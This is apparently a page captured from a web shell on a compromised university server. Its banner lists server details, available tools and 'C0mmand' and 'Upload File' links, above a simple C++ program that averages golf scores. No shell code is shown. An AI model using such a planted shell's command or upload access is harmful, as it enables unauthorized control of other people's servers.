Server IP : 172.16.15.8 / Your IP : 18.222.182.249 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/cathomas/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
#include <iostream> #include <iomanip> using namespace std; int main () { int score, hiscore, loscore, totalscore, numscores; float avgscore; // input first score cin >> score; // initialize the variables numscores = 0; totalscore = 0; hiscore = 0; loscore = 500; cout << "\n Golf Scores: \n"; // loop through the grades in the file until -1 is detected while (score != -1) { //Count the score numscores++; //Add score to the running total totalscore = score + totalscore; //Check for the highest score if (score > hiscore) hiscore = score; if (score < loscore) loscore = score; cout << score << "\n"; // input the next score cin >> score; } // Calculate the average score avgscore = static_cast<float> (totalscore) / numscores; // Display the average score, the highest score, and the lowest score cout << "\nThe average score is: " << avgscore; cout << "\nThe lowest score is: " << loscore; cout << "\nThe highest score is: " << hiscore; return 0; }